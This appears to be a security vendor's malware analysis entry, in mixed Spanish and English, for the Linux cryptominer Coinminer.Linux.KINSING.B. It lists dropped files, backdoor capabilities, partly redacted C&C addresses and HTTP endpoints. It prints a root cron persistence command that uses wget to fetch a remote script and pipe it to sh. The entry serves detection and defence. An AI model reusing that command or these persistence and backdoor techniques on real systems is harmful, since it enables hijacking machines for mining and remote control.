Coinminer.Linux.KINSING.B

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Ejecuta comandos desde un usuario remoto malicioso que pone en peligro el sistema afectado.

Se conecta a determinados sitios Web para enviar y recibir información.

Detalles de entrada

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Instalación

Infiltra y ejecuta los archivos siguientes:

• /tmp/salt-minions
• One of the following:
  
  • /usr/bin/salt-store
  • /tmp/salt-store
  • /var/tmp/salt-store
• /tmp/.ICEd-unix/VpJHY

Crea las carpetas siguientes:

• /tmp/.ICEd-unix

Rutina de puerta trasera

Ejecuta los comandos siguientes desde un usuario remoto malicioso:

• Downloads and executes a file
• Reverse shell
• Command Execution
• Command Execution with outputs returned
• Download and install updates of itself

Finalización del proceso

Finaliza los procesos siguientes si detecta que se ejecutan en la memoria del sistema afectado:

• salt-minions

Otros detalles

Se conecta al sitio Web siguiente para enviar y recibir información:

• {BLOCKED}.{BLOCKED}.129.111
• {BLOCKED}.{BLOCKED}.88.186
• {BLOCKED}.{BLOCKED}.200.161
• {BLOCKED}.{BLOCKED}.44.216
• {BLOCKED}.{BLOCKED}.87.231

Hace lo siguiente:

• It reads the following system info:
  • Product Name
  • Product Version
  • Product Serial
  • Product UUID
  • Board Vendor
  • Board Name
  • Board Version
  • Board Serial
  • Board Asset Tag
  • Chassis Vendor
  • Chassis Type
  • Chassis Version
  • Chassis Serial
  • Chassis Asset Tag
  • Bios Vendor
  • Bios Version
  • Bios Date
  • Sys Vendor
  • Kernel Version
  
  
• Reads the following information from /sys:
  • /sys/devices/system/cpu/possible
  • /sys/fs/cgroup/cpuset//cpuset.cpus
  • /sys/fs/cgroup/cpuset//cpuset/mems
  • /sys/devices/system/cpu/online
  • /sys/bus/cpu/devices/cpu{0-4}/topology/package_cpus
  • /sys/bus/cpu/devices/cpu{0-4}/topology/core_cpus
  • /sys/bus/cpu/devices/cpu{0-4}/topology/thread_siblings
  • /sys/bus/node/devices/node{0-4}/cpumap
  • /sys/bus/cpu/devices
  • /sys/bus/cpu/devices/cpu{0-4}/topology
  • /sys/bus/cpu/devices/cpu{0-4}/topology/core_siblings
  • /sys/bus/cpu/devices/cpu{0-4}/online
  • /sys/bus/cpu/devices/cpu{0-4}/topology/physical_package_id
  • /sys/bus/cpu/devices/cpu{0-4}/topology/die_cpu
  • /sys/bus/cpu/devices/cpu{0-4}/topology/core_id
  • /sys/bus/cpu/devices/cpu{0-4}/topology/book_siblings
  • /sys/bus/cpu/devices/cpu{0-4}/cache/Index{0-4}/level
  • /sys/bus/cpu/devices/cpu{0-4}/cache/Index{0-4}/size
  • /sys/bus/cpu/devices/cpu{0-4}/cache/Index{0-4}/coherency_line_size
  • /sys/bus/cpu/devices/cpu{0-4}/cache/Index{0-4}/number_of_sets
  • /sys/bus/cpu/devices/cpu{0-4}/cache/Index{0-4}/physical_line_partition
  • /sys/bus/cpu/devices/cpu{0-4}/cache/Index{0-4}/shared_cpu_map
  • /sys/bus/cpu/devices/cpu{0-4}/cache/Index{0-4}/type
  • /sys/kernel/mm/hugepages
  • /sys/bus/node/devices
  • /sys/bus/node/devices/node{0-4}/hugepages
  
  
• Reads the following information from /proc:
  • /proc/cpuinfo
  • /proc/self/cgroup
  • /proc/mounts
  • /proc/meminfo
• It creates the following cron jobs for persistence:
  
  • Path: /var/spool/cron/crontabs/root
  • Schedule: Every Minute
  • Command: * * * * * wget -q -O - http://{BLOCKED}.{BLOCKED}.117.137/c.sh | sh > /dev/null 2>&1
  • Path: /var/spool/cron/crontabs/root
  • Schedule: Every Minute
  • Command: * * * * * /usr/bin/salt-store || /tmp/salt-store || /var/tmp/salt-store
• Deletes the following cron jobs with the following strings:
  
  • "update.sh"
  • "logo4"
  • "logo9"
  • "logo0"
  • "logo"
  • "tor2web"
  • "jpg"
  • "png"
  • "tmp"
  • "zmreplchkr"
  • "aliyun.one"
  • "3.215.110.66.one"
  • "pastebin"
  • "onion"
  • "lsd.systemten.org"
  • "shuf"
  • "ash"
  • "mr.sh"
  • "185.181.10.234"
  • "localhost.xyz"
• It sends the following HTTP request to the C&C Server:
  
  • GET /h
  • Checks for the connectivity on the C&C server
  • GET /get
  • Fetch the next task/command from the C&C server (404 Not Found means there is no ongoing task/command)
  • POST /o
  • Sends Exec output to the C&C server